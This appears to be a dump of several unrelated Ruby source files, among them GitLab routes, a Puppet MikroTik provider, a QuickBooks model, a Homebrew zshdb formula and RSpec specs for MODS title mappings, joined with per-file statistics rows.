resources :graphs, only: [:show], constraints: { id: /(?:[^.]|\.(?!json$))+/, format: /json/ } do
member do
get :commits
get :ci
end
end
get '/compare/:from...:to' => 'compare#show', :as => 'compare',
:constraints => { from: /.+/, to: /.+/ }
resources :snippets, constraints: { id: /\d+/ } do
member do
get 'raw'
end
end
WIKI_SLUG_ID = { id: /[a-zA-Z.0-9_\-\/]+/ } unless defined? WIKI_SLUG_ID
scope do
# Order matters to give priority to these matches
get '/wikis/git_access', to: 'wikis#git_access'
get '/wikis/pages', to: 'wikis#pages', as: 'wiki_pages'
post '/wikis', to: 'wikis#create'
get '/wikis/*id/history', to: 'wikis#history', as: 'wiki_history', constraints: WIKI_SLUG_ID
get '/wikis/*id/edit', to: 'wikis#edit', as: 'wiki_edit', constraints: WIKI_SLUG_ID
get '/wikis/*id', to: 'wikis#show', as: 'wiki', constraints: WIKI_SLUG_ID
delete '/wikis/*id', to: 'wikis#destroy', constraints: WIKI_SLUG_ID
put '/wikis/*id', to: 'wikis#update', constraints: WIKI_SLUG_ID
end
resource :repository, only: [:show, :create] do
member do
get 'archive', constraints: { format: Gitlab::Regex.archive_formats_regex }
end
end
resources :services, constraints: { id: /[^\/]+/ }, only: [:index, :edit, :update] do
member do
get :test
end
end
resources :deploy_keys, constraints: { id: /\d+/ }, only: [:index, :new, :create] do
member do
put :enable
put :disable
end
end
resource :fork, only: [:new, :create]
resource :import, only: [:new, :create, :show]
resources :refs, only: [] do
collection do
get 'switch'
end
member do
# tree viewer logs
get 'logs_tree', constraints: { id: Gitlab::Regex.git_reference_regex }
# Directories with leading dots erroneously get rejected if git
# ref regex used in constraints. Regex verification now done in controller.
get 'logs_tree/*path' => 'refs#logs_tree', as: :logs_file, constraints: {
id: /.*/,
path: /.*/
}
end
end
resources :merge_requests, constraints: { id: /\d+/ }, except: [:destroy] do
member do
get :diffs
get :commits
post :merge
get :merge_check
get :ci_status
post :toggle_subscription
end
collection do
get :branch_from
get :branch_to
get :update_branches
end
end
resources :branches, only: [:index, :new, :create, :destroy], constraints: { id: Gitlab::Regex.git_reference_regex }
resources :tags, only: [:index, :show, :new, :create, :destroy], constraints: { id: Gitlab::Regex.git_reference_regex } do
resource :release, only: [:edit, :update]
end
resources :protected_branches, only: [:index, :create, :update, :destroy], constraints: { id: Gitlab::Regex.git_reference_regex }
resource :variables, only: [:show, :update]
resources :triggers, only: [:index, :create, :destroy]
resource :ci_settings, only: [:edit, :update, :destroy]
resources :ci_web_hooks, only: [:index, :create, :destroy] do
member do
get :test
end
end
resources :ci_services, constraints: { id: /[^\/]+/ }, only: [:index, :edit, :update] do
member do
get :test
end
end
resources :builds, only: [:index, :show] do
collection do
post :cancel_all
end
member do
get :status
post :cancel
get :download
post :retry
end
end
resources :hooks, only: [:index, :create, :destroy], constraints: { id: /\d+/ } do
member do
get :test
end
end
resources :milestones, constraints: { id: /\d+/ } do
member do
put :sort_issues
put :sort_merge_requests
end
end
resources :labels, constraints: { id: /\d+/ } do
collection do
post :generate
end
end
resources :issues, constraints: { id: /\d+/ }, except: [:destroy] do
member do
post :toggle_subscription
end
collection do
post :bulk_update
end
end
resources :project_members, except: [:new, :edit], constraints: { id: /[a-zA-Z.\/0-9_\-#%+]+/ } do
collection do
delete :leave
# Used for import team
# from another project
get :import
post :apply_import
end
member do
post :resend_invite
end
end
resources :notes, only: [:index, :create, :destroy, :update], constraints: { id: /\d+/ } do
member do
delete :delete_attachment
end
collection do
post :award_toggle
end
end
resources :uploads, only: [:create] do
collection do
get ":secret/:filename", action: :show, as: :show, constraints: { filename: /[^\/]+/ }
end
end
resources :runners, only: [:index, :edit, :update, :destroy, :show] do
member do
get :resume
get :pause
end
end
end
end
end
get ':id' => 'namespaces#show', constraints: { id: /(?:[^.]|\.(?!atom$))+/, format: /atom/ }
end
| 27.204052 | 184 | 0.537717 |
bfddea2ccd776e6ef47bdec5c370721fc4dacefb | 1,584 | require 'puppet/provider/mikrotik_api'
Puppet::Type.type(:mikrotik_interface_bridge).provide(:mikrotik_api, :parent => Puppet::Provider::Mikrotik_Api) do
confine :feature => :mtik
mk_resource_methods
def self.instances
interfaces = Puppet::Provider::Mikrotik_Api::get_all("/interface/bridge")
instances = interfaces.collect { |interface| interface(interface) }
instances
end
def self.interface(data)
if data['disabled'] == "true"
state = :disabled
else
state = :enabled
end
new(
:ensure => :present,
:state => state,
:name => data['name'],
:mtu => data['mtu'],
:arp => data['arp'],
:arp_timeout => data['arp-timeout'],
:admin_mac => data['admin-mac']
)
end
def flush
Puppet.debug("Flushing Bridge #{resource[:name]}")
params = {}
if @property_hash[:state] == :disabled
params["disabled"] = 'yes'
elsif @property_hash[:state] == :enabled
params["disabled"] = 'no'
end
params["name"] = resource[:name]
params["mtu"] = resource[:mtu] if ! resource[:mtu].nil?
params["arp"] = resource[:arp] if ! resource[:arp].nil?
params["arp-timeout"] = resource[:arp_timeout] if ! resource[:arp_timeout].nil?
params["admin-mac"] = resource[:admin_mac] if ! resource[:admin_mac].nil?
lookup = {}
lookup["name"] = resource[:name]
Puppet.debug("Params: #{params.inspect} - Lookup: #{lookup.inspect}")
simple_flush("/interface/bridge", params, lookup)
end
end | 28.285714 | 114 | 0.600379 |
f71a8e64b2595bab3748e01e5bdaa2a77a3e6a15 | 223 | require "rails_helper"
RSpec.describe HearingType, type: :model do
it { is_expected.to belong_to(:casa_org) }
it { is_expected.to validate_presence_of(:active) }
it { is_expected.to validate_presence_of(:name) }
end
| 27.875 | 53 | 0.757848 |
61c6a4c8acb353bbbb62f8417cb6f7cff152a018 | 1,943 | module Quickbooks
module Model
class PurchaseOrder < BaseModel
include GlobalTaxCalculation
#== Constants
REST_RESOURCE = 'purchaseorder'
XML_COLLECTION_NODE = "PurchaseOrder"
XML_NODE = "PurchaseOrder"
xml_accessor :id, :from => 'Id', :as => Integer
xml_accessor :sync_token, :from => 'SyncToken', :as => Integer
xml_accessor :meta_data, :from => 'MetaData', :as => MetaData
xml_accessor :doc_number, :from => 'DocNumber'
xml_accessor :txn_date, :from => 'TxnDate', :as => Date
xml_accessor :custom_fields, :from => 'CustomField', :as => [CustomField]
xml_accessor :private_note, :from => 'PrivateNote'
xml_accessor :linked_transactions, :from => 'LinkedTxn', :as => [LinkedTransaction]
xml_accessor :line_items, :from => 'Line', :as => [PurchaseLineItem]
xml_accessor :attachable_ref, :from => 'AttachableRef', :as => BaseReference
xml_accessor :vendor_ref, :from => 'VendorRef', :as => BaseReference
xml_accessor :ap_account_ref, :from => 'APAccountRef', :as => BaseReference
xml_accessor :class_ref, :from => 'ClassRef', :as => BaseReference
xml_accessor :sales_term_ref, :from => 'SalesTermRef', :as => BaseReference
xml_accessor :total_amount, :from => 'TotalAmt', :as => BigDecimal, :to_xml => Proc.new { |val| val.to_f }
xml_accessor :due_date, :from => 'DueDate', :as => Date
xml_accessor :vendor_address, :from => 'VendorAddr', :as => PhysicalAddress
xml_accessor :ship_address, :from => 'ShipAddr', :as => PhysicalAddress
xml_accessor :ship_method_ref, :from => 'ShipMethodRef', :as => BaseReference
xml_accessor :po_status, :from => 'POStatus'
xml_accessor :txn_tax_detail, :from => 'TxnTaxDetail', :as => TransactionTaxDetail
reference_setters :attachable_ref, :vendor_ref, :ap_account_ref, :class_ref, :sales_term_ref, :ship_method_ref
end
end
end
| 47.390244 | 116 | 0.672156 |
033fe054283fed849c872c1e53daf43d1f6bf690 | 979 | # -*- encoding: utf-8 -*-
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'rubycas-server-core/version'
Gem::Specification.new do |gem|
gem.name = "rubycas-server-core"
gem.version = RubyCAS::Server::Core::Version::STRING
gem.authors = ["Robert Mitwicki", 'Tyler Pickett']
gem.email = ["[email protected]", '[email protected]']
gem.description = %q{The core logic for handling CAS requests independent of any web presentation technology.}
gem.summary = %q{The core logic for handling CAS requests.}
gem.homepage = "http://rubycas.github.com"
gem.files = `git ls-files`.split($/)
gem.executables = gem.files.grep(%r{^bin/}).map{ |f| File.basename(f) }
gem.test_files = gem.files.grep(%r{^(test|spec|features)/})
gem.require_paths = ["lib"]
gem.add_dependency "r18n-core"
gem.add_dependency "activesupport", ">= 3.0"
end
| 42.565217 | 114 | 0.664964 |
d58f8ecf28b580eb140a06f21af93112953ff288 | 1,896 | require 'setka/workflow/version'
# Ruby implementations of Setka Workflow API for integration an external
# publishing platform written in the Ruby language with Setka Workflow.
#
# First of all access token should be obtained. It can be acomplished on
# Integration page of Settings
# (https://workflow.setka.io/spacename/settings/api
# where spacename is name of your space).
module Setka
module Workflow
autoload :Client, 'setka/workflow/client'
autoload :Request, 'setka/workflow/request'
autoload :Response, 'setka/workflow/response'
autoload :Configuration, 'setka/workflow/configuration'
autoload :Resource, 'setka/workflow/resource'
autoload :Ticket, 'setka/workflow/ticket'
autoload :Category, 'setka/workflow/category'
BASE_ENDPOINT = 'workflow.setka.io'.freeze
# Current default version of API
API_VERSION = 3
# Basic Workflow error
Error = Class.new(StandardError)
# This error is thrown when your client has not been configured
ConfigurationError = Class.new(Error)
# This error is thrown when format of the param is wrong
WrongParamError = Class.new(Error)
# This error is thrown when access token is invalid
InvalidAccessToken = Class.new(Error)
# This error is thrown when Setka Workflow responds with 500
InternalServerError = Class.new(Error)
# Clears current client
def self.reset!
@client = nil
end
# Gets current client
def self.client
@client ||= Setka::Workflow::Client.new
end
# Workflow client configuration in the global manner
def self.configure(&block)
reset!
client.configure(&block)
end
def self.logger
@logger ||= Logger.new(STDOUT)
end
# Sets custom logger
def self.logger=(logger)
@logger = logger
end
end
end
| 28.298507 | 72 | 0.684072 |
4a359aa9b7aa5ca9077ec565a2cf3ca1ca92e309 | 1,750 | class Zshdb < Formula
desc "Debugger for zsh"
homepage "https://github.com/rocky/zshdb"
url "https://downloads.sourceforge.net/project/bashdb/zshdb/1.1.2/zshdb-1.1.2.tar.gz"
sha256 "bf9cb36f60ce6833c5cd880c58d6741873b33f5d546079eebcfce258d609e9af"
license "GPL-3.0"
# We check the "zshdb" directory page because the bashdb project contains
# various software and zshdb releases may be pushed out of the SourceForge
# RSS feed.
livecheck do
url "https://sourceforge.net/projects/bashdb/files/zshdb/"
strategy :page_match
regex(%r{href=(?:["']|.*?zshdb/)?v?(\d+(?:[.-]\d+)+)/?["' >]}i)
end
bottle do
cellar :any_skip_relocation
sha256 "192eac5cebd479f637b5a0d6ea50abb908f0ab2453b570e9888a16f1c5eea1ec" => :big_sur
sha256 "388da120bb13ac218a9940ac65353776836a05a1d7b22b464d87800d5b7a8f91" => :arm64_big_sur
sha256 "2bdc583e95b4d4bd92624d48ce804561e3a337792dbba74f451a2507eb939704" => :catalina
sha256 "2bdc583e95b4d4bd92624d48ce804561e3a337792dbba74f451a2507eb939704" => :mojave
sha256 "2bdc583e95b4d4bd92624d48ce804561e3a337792dbba74f451a2507eb939704" => :high_sierra
end
head do
url "https://github.com/rocky/zshdb.git"
depends_on "autoconf" => :build
depends_on "automake" => :build
end
depends_on "zsh"
def install
system "./autogen.sh" if build.head?
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--with-zsh=#{HOMEBREW_PREFIX}/bin/zsh"
system "make", "install"
end
test do
require "open3"
Open3.popen3("#{bin}/zshdb -c 'echo test'") do |stdin, stdout, _|
stdin.write "exit\n"
assert_match(/That's all, folks/, stdout.read)
end
end
end
| 34.313725 | 95 | 0.698286 |
b917e8629f597f797f3ca6ecf15d21fa2a518c68 | 329 | require "ruby-cbc/version"
require "cbc-wrapper"
module Cbc
end
files = %w[
conflict_solver
model
problem
version
ilp/constant
ilp/constraint
ilp/objective
ilp/term
ilp/term_array
ilp/var
utils/compressed_row_storage
]
files.each do |file|
require File.expand_path("../ruby-cbc/#{file}", __FILE__)
end
| 13.708333 | 59 | 0.723404 |
f7bf4a41299962fb95253960abf9e9bf8304b72a | 37,827 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe 'MODS titleInfo <--> cocina mappings' do
describe 'Basic title' do
# How to ID: only subelement of titleInfo is title and no titleInfo type attribute
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo>
<title>Gaudy night</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: 'Gaudy night'
}
]
}
end
end
end
describe 'Title with parts' do
# How to ID: multiple subelements in titleInfo
# NOTE: the nonsorting character count should be the number of characters in the nonsorting characters value plus 1
# unless the nonsorting characters value ends with an apostrophe or a hyphen.
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo>
<nonSort>The</nonSort>
<title>journal of stuff</title>
<subTitle>a journal</subTitle>
<partNumber>volume 5</partNumber>
<partName>special issue</partName>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
structuredValue: [
{
value: 'The',
type: 'nonsorting characters'
},
{
value: 'journal of stuff',
type: 'main title'
},
{
value: 'a journal',
type: 'subtitle'
},
{
value: 'volume 5',
type: 'part number'
},
{
value: 'special issue',
type: 'part name'
}
],
note: [
{
value: '4',
type: 'nonsorting character count'
}
]
}
]
}
end
end
end
describe 'Alternative title' do
# How to ID: titleInfo type="alternative"
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary">
<title>Five red herrings</title>
</titleInfo>
<titleInfo type="alternative">
<title>Suspicious characters</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: 'Five red herrings',
status: 'primary'
},
{
value: 'Suspicious characters',
type: 'alternative'
}
]
}
end
end
end
describe 'Translated title' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary" lang="fre" altRepGroup="1">
<title>Les misérables</title>
</titleInfo>
<titleInfo type="translated" lang="eng" altRepGroup="1">
<title>The wretched</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
parallelValue: [
{
value: 'Les misérables',
status: 'primary',
valueLanguage: {
code: 'fre',
source: {
code: 'iso639-2b'
}
}
},
{
value: 'The wretched',
valueLanguage: {
code: 'eng',
source: {
code: 'iso639-2b'
}
},
type: 'translated'
}
]
}
]
}
end
end
end
describe 'Translated title (title is structuredValue)' do
# How to ID: titleInfo type="translated"
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary" lang="fre" altRepGroup="1">
<nonSort>Les</nonSort>
<title>misérables</title>
</titleInfo>
<titleInfo type="translated" lang="eng" altRepGroup="1">
<nonSort>The</nonSort>
<title>wretched</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
parallelValue: [
{
structuredValue: [
{
value: 'Les',
type: 'nonsorting characters'
},
{
value: 'misérables',
type: 'main title'
}
],
note: [
{
value: '4',
type: 'nonsorting character count'
}
],
status: 'primary',
valueLanguage: {
code: 'fre',
source: {
code: 'iso639-2b'
}
}
},
{
structuredValue: [
{
value: 'The',
type: 'nonsorting characters'
},
{
value: 'wretched',
type: 'main title'
}
],
note: [
{
value: '4',
type: 'nonsorting character count'
}
],
valueLanguage: {
code: 'eng',
source: {
code: 'iso639-2b'
}
},
type: 'translated'
}
]
}
]
}
end
end
end
describe 'Transliterated title (title is value)' do
# How to ID: presence of titleInfo transliteration attribute (may need to manually review all records with a
# titleInfo script element to catch additional instances)
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary" lang="rus" script="Cyrl" altRepGroup="1">
<title>Война и миръ</title>
</titleInfo>
<titleInfo type="translated" lang="rus" script="Latn" transliteration="ALA-LC Romanization Tables" altRepGroup="1">
<title>Voĭna i mir</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
parallelValue: [
{
value: 'Война и миръ',
status: 'primary',
valueLanguage: {
code: 'rus',
source: {
code: 'iso639-2b'
},
valueScript: {
code: 'Cyrl',
source: {
code: 'iso15924'
}
}
}
},
{
value: 'Voĭna i mir',
valueLanguage: {
code: 'rus',
source: {
code: 'iso639-2b'
},
valueScript: {
code: 'Latn',
source: {
code: 'iso15924'
}
}
},
type: 'transliterated',
standard: {
value: 'ALA-LC Romanization Tables'
}
}
]
}
]
}
end
end
end
describe 'Transliterated title (not parallel)' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo transliteration="ALA-LC Romanization Tables">
<title>Mā baʻda 1930</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: 'Mā baʻda 1930',
type: 'transliterated',
standard: {
value: 'ALA-LC Romanization Tables'
}
}
]
}
end
end
end
describe 'Uniform title with authority' do
# How to ID: titleInfo type="uniform"
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary">
<title>Hamlet</title>
</titleInfo>
<titleInfo type="uniform" authority="naf" authorityURI="http://id.loc.gov/authorities/names/"
valueURI="http://id.loc.gov/authorities/names/n80008522" nameTitleGroup="1">
<title>Hamlet</title>
</titleInfo>
<name usage="primary" type="personal" authority="naf" authorityURI="http://id.loc.gov/authorities/names/"
valueURI="http://id.loc.gov/authorities/names/n78095332" nameTitleGroup="1">
<namePart>Shakespeare, William, 1564-1616</namePart>
</name>
XML
end
let(:cocina) do
{
title: [
{
value: 'Hamlet',
status: 'primary'
},
{
structuredValue: [
{
value: 'Hamlet',
type: 'title'
},
{
value: 'Shakespeare, William, 1564-1616',
type: 'name',
uri: 'http://id.loc.gov/authorities/names/n78095332',
source: {
uri: 'http://id.loc.gov/authorities/names/',
code: 'naf'
}
}
],
type: 'uniform',
source: {
uri: 'http://id.loc.gov/authorities/names/',
code: 'naf'
},
uri: 'http://id.loc.gov/authorities/names/n80008522'
}
],
contributor: [
{
name: [
{
value: 'Shakespeare, William, 1564-1616',
uri: 'http://id.loc.gov/authorities/names/n78095332',
source: {
uri: 'http://id.loc.gov/authorities/names/',
code: 'naf'
}
}
],
status: 'primary',
type: 'person'
}
]
}
end
end
end
describe 'Uniform title with multiple namePart subelements' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo type="uniform" nameTitleGroup="1">
<title>Princesse jaune. Vocal score</title>
</titleInfo>
<name type="personal" usage="primary" nameTitleGroup="1">
<namePart type="family">Saint-Saëns</namePart>
<namePart type="given">Camille</namePart>
<namePart type="date">1835-1921</namePart>
</name>
XML
end
let(:cocina) do
{
title: [
{
structuredValue: [
{
value: 'Princesse jaune. Vocal score',
type: 'title'
},
{
structuredValue: [
{
value: 'Saint-Saëns',
type: 'surname'
},
{
value: 'Camille',
type: 'forename'
},
{
value: '1835-1921',
type: 'life dates'
}
],
type: 'name'
}
],
type: 'uniform'
}
],
contributor: [
{
name: [
{
structuredValue: [
{
value: 'Saint-Saëns',
type: 'surname'
},
{
value: 'Camille',
type: 'forename'
},
{
value: '1835-1921',
type: 'life dates'
}
]
}
],
type: 'person',
status: 'primary'
}
]
}
end
end
end
describe 'Name-title authority plus additional contributor not part of uniform title' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary">
<title>Hamlet</title>
</titleInfo>
<titleInfo type="uniform" authority="naf" authorityURI="http://id.loc.gov/authorities/names/"
valueURI="http://id.loc.gov/authorities/names/n80008522" nameTitleGroup="1">
<title>Hamlet</title>
</titleInfo>
<name usage="primary" type="personal" authority="naf" authorityURI="http://id.loc.gov/authorities/names/"
valueURI="http://id.loc.gov/authorities/names/n78095332" nameTitleGroup="1">
<namePart>Shakespeare, William, 1564-1616</namePart>
</name>
<name type="personal" authority="naf" authorityURI="http://id.loc.gov/authorities/names/"
valueURI="http://id.loc.gov/authorities/names/n78088956">
<namePart>Marlowe, Christopher, 1564-1593</namePart>
</name>
XML
end
let(:cocina) do
{
title: [
{
value: 'Hamlet',
status: 'primary'
},
{
structuredValue: [
{
value: 'Hamlet',
type: 'title'
},
{
value: 'Shakespeare, William, 1564-1616',
type: 'name',
uri: 'http://id.loc.gov/authorities/names/n78095332',
source: {
uri: 'http://id.loc.gov/authorities/names/',
code: 'naf'
}
}
],
type: 'uniform',
uri: 'http://id.loc.gov/authorities/names/n80008522',
source: {
uri: 'http://id.loc.gov/authorities/names/',
code: 'naf'
}
}
],
contributor: [
{
name: [
{
value: 'Shakespeare, William, 1564-1616',
uri: 'http://id.loc.gov/authorities/names/n78095332',
source: {
uri: 'http://id.loc.gov/authorities/names/',
code: 'naf'
}
}
],
type: 'person',
status: 'primary'
},
{
name: [
{
value: 'Marlowe, Christopher, 1564-1593',
uri: 'http://id.loc.gov/authorities/names/n78088956',
source: {
uri: 'http://id.loc.gov/authorities/names/',
code: 'naf'
}
}
],
type: 'person'
}
]
}
end
end
end
describe 'Uniform title with repetition of author' do
# Adapted from kd992vz2371
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo type="uniform" nameTitleGroup="1">
<title>Roman de la Rose. 1878</title>
</titleInfo>
<name type="personal" usage="primary" nameTitleGroup="1">
<namePart>Guillaume</namePart>
<namePart type="termsOfAddress">de Lorris</namePart>
<namePart type="date">active 1230</namePart>
</name>
<name type="personal">
<namePart>Guillaume</namePart>
<namePart type="termsOfAddress">de Lorris</namePart>
<namePart type="date">active 1230</namePart>
</name>
XML
end
# Ignore usage and nameTitleGroup when determining duplication
let(:roundtrip_mods) do
<<~XML
<titleInfo type="uniform" nameTitleGroup="1">
<title>Roman de la Rose. 1878</title>
</titleInfo>
<name type="personal" usage="primary" nameTitleGroup="1">
<namePart>Guillaume</namePart>
<namePart type="termsOfAddress">de Lorris</namePart>
<namePart type="date">active 1230</namePart>
</name>
XML
end
let(:cocina) do
{
title: [
{
structuredValue: [
{
value: 'Roman de la Rose. 1878',
type: 'title'
},
{
structuredValue: [
{
value: 'Guillaume',
type: 'name'
},
{
value: 'de Lorris',
type: 'term of address'
},
# Type 'activity dates' when value starts with 'active', 'fl', or 'floruit'
{
value: 'active 1230',
type: 'activity dates'
}
],
type: 'name'
}
],
type: 'uniform'
}
],
contributor: [
{
name: [
{
structuredValue: [
{
value: 'Guillaume',
type: 'name'
},
{
value: 'de Lorris',
type: 'term of address'
},
{
value: 'active 1230',
type: 'activity dates'
}
]
}
],
type: 'person',
status: 'primary'
}
]
}
end
end
let(:warnings) do
[
Notification.new(msg: 'Duplicate name entry')
]
end
end
describe 'Supplied title' do
# How to ID: titleInfo supplied="yes"
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo supplied="yes">
<title>"Because I could not stop for death"</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: '"Because I could not stop for death"',
type: 'supplied'
}
]
}
end
end
end
describe 'Abbreviated title' do
# How to ID: titleInfo type="abbreviated"
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary">
<title>Annual report of notifiable diseases</title>
</titleInfo>
<titleInfo type="abbreviated" authority="dnlm">
<title>Annu. rep. notif. dis.</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: 'Annual report of notifiable diseases',
status: 'primary'
},
{
value: 'Annu. rep. notif. dis.',
type: 'abbreviated',
source: {
code: 'dnlm'
}
}
]
}
end
end
end
describe 'Parallel titles' do
# How to ID: edge case requiring manual review of records with multiple titleInfo type="translated" instances
xit 'not implemented: multiple type="translated" edge case' do
let(:mods) do
<<~XML
<titleInfo type="translated" lang="ger" altRepGroup="1">
<title>Berliner Mauer Kunst</title>
</titleInfo>
<titleInfo type="translated" lang="eng" altRepGroup="1">
<title>Berlin's wall art</title>
</titleInfo>
<titleInfo type="translated" lang="spa" altRepGroup="1">
<title>Arte en el muro de Berlin</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
parallelValue: [
{
value: 'Berliner Mauer Kunst',
valueLanguage: {
code: 'ger',
source: {
code: 'iso639-2b'
}
}
},
{
value: "Berlin's wall art",
valueLanguage: {
code: 'eng',
source: {
code: 'iso639-2b'
}
}
},
{
value: 'Arte en el muro de Berlin',
valueLanguage: {
code: 'spa',
source: {
code: 'iso639-2b'
}
}
}
],
type: 'parallel'
}
]
}
end
end
end
describe 'Multiple untyped titles without primary' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo>
<title>Symphony no. 6</title>
</titleInfo>
<titleInfo>
<title>Pastoral symphony</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: 'Symphony no. 6'
},
{
value: 'Pastoral symphony'
}
]
}
end
end
end
describe 'Multiple typed titles without primary' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo>
<title>Symphony no. 6</title>
</titleInfo>
<titleInfo type="alternative">
<title>Pastoral symphony</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: 'Symphony no. 6'
},
{
value: 'Pastoral symphony',
type: 'alternative'
}
]
}
end
end
end
describe 'Title with display label' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo usage="primary">
<title>Unnatural death</title>
</titleInfo>
<titleInfo type="alternative" displayLabel="Original U.S. title">
<title>The Dawson pedigree</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
value: 'Unnatural death',
status: 'primary'
},
{
value: 'The Dawson pedigree',
type: 'alternative',
displayLabel: 'Original U.S. title'
}
]
}
end
end
end
describe 'Link to external value only' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo xlink:href="http://title.org/title" />
XML
end
let(:cocina) do
{
title: [
{
valueAt: 'http://title.org/title'
}
]
}
end
end
end
describe 'Multilingual uniform title' do
it_behaves_like 'MODS cocina mapping' do
# Both <name> elements have usage="primary" so "status": "primary" maps to contributor rather than name.
let(:mods) do
<<~XML
<titleInfo>
<title>Mishnah berurah</title>
<subTitle>the classic commentary to Shulchan aruch Orach chayim, comprising the laws of daily Jewish conduct</subTitle>
</titleInfo>
<titleInfo type="uniform" nameTitleGroup="1" altRepGroup="1">
<title>Mishnah berurah. English and Hebrew</title>
</titleInfo>
<name type="personal" usage="primary" altRepGroup="2" nameTitleGroup="1">
<namePart>Israel Meir</namePart>
<namePart type="termsOfAddress">ha-Kohen</namePart>
<namePart type="date">1838-1933</namePart>
</name>
<name type="personal" altRepGroup="2" script="" nameTitleGroup="2">
<namePart>Israel Meir in Hebrew characters</namePart>
<namePart type="date">1838-1933</namePart>
</name>
<titleInfo type="uniform" nameTitleGroup="2" altRepGroup="1" script="">
<title>Mishnah berurah in Hebrew characters</title>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
parallelValue: [
{
structuredValue: [
{
value: 'Mishnah berurah. English and Hebrew',
type: 'title'
},
{
structuredValue: [
{
value: 'Israel Meir',
type: 'name'
},
{
value: 'ha-Kohen',
type: 'term of address'
},
{
value: '1838-1933',
type: 'life dates'
}
],
type: 'name'
}
]
},
{
structuredValue: [
{
structuredValue: [
{
value: 'Israel Meir in Hebrew characters',
type: 'name'
},
{
value: '1838-1933',
type: 'life dates'
}
],
type: 'name'
},
{
value: 'Mishnah berurah in Hebrew characters',
type: 'title'
}
]
}
],
type: 'uniform'
},
{
structuredValue: [
{
value: 'Mishnah berurah',
type: 'main title'
},
{
value: 'the classic commentary to Shulchan aruch Orach chayim, comprising the laws of daily Jewish conduct',
type: 'subtitle'
}
]
}
],
contributor: [
{
name: [
{
parallelValue: [
{
structuredValue: [
{
value: 'Israel Meir',
type: 'name'
},
{
value: 'ha-Kohen',
type: 'term of address'
},
{
value: '1838-1933',
type: 'life dates'
}
],
status: 'primary'
},
{
structuredValue: [
{
value: 'Israel Meir in Hebrew characters',
type: 'name'
},
{
value: '1838-1933',
type: 'life dates'
}
]
}
],
type: 'person',
status: 'primary'
}
]
}
]
}
end
# Only change in round-trip mapping is dropping empty script attributes. In the round-trip 'name usage="primary"'
# would come from the COCINA contributor property, not the title property, which is why it's not in the COCINA title mapping above, but still in the MODS below.
let(:roundtrip_mods) do
<<~XML
<titleInfo>
<title>Mishnah berurah</title>
<subTitle>the classic commentary to Shulchan aruch Orach chayim, comprising the laws of daily Jewish conduct</subTitle>
</titleInfo>
<titleInfo type="uniform" nameTitleGroup="1" altRepGroup="1">
<title>Mishnah berurah. English and Hebrew</title>
</titleInfo>
<name type="personal" usage="primary" altRepGroup="2" nameTitleGroup="1">
<namePart>Israel Meir</namePart>
<namePart type="termsOfAddress">ha-Kohen</namePart>
<namePart type="date">1838-1933</namePart>
</name>
<name type="personal" altRepGroup="2" nameTitleGroup="2">
<namePart>Israel Meir in Hebrew characters</namePart>
<namePart type="date">1838-1933</namePart>
</name>
<titleInfo type="uniform" nameTitleGroup="2" altRepGroup="1">
<title>Mishnah berurah in Hebrew characters</title>
</titleInfo>
XML
end
end
end
describe 'Title with xml:space="preserve"' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo>
<nonSort xml:space="preserve">A </nonSort>
<title>broken journey</title>
<subTitle>memoir of Mrs. Beatty, wife of Rev. William Beatty, Indian missionary</subTitle>
</titleInfo>
XML
end
let(:cocina) do
{
title: [
{
structuredValue: [
{
value: 'A',
type: 'nonsorting characters'
},
{
value: 'broken journey',
type: 'main title'
},
{
value: 'memoir of Mrs. Beatty, wife of Rev. William Beatty, Indian missionary',
type: 'subtitle'
}
],
note: [
{
value: '2',
type: 'nonsorting character count'
}
]
}
]
}
end
# dropped xml:space="preserve" attribute on nonSort
let(:roundtrip_mods) do
<<~XML
<titleInfo>
<nonSort>A </nonSort>
<title>broken journey</title>
<subTitle>memoir of Mrs. Beatty, wife of Rev. William Beatty, Indian missionary</subTitle>
</titleInfo>
XML
end
end
end
describe 'Uniform title with corporate author' do
it_behaves_like 'MODS cocina mapping' do
let(:mods) do
<<~XML
<titleInfo type="uniform" nameTitleGroup="1">
<title>Laws, etc. (United States code service)</title>
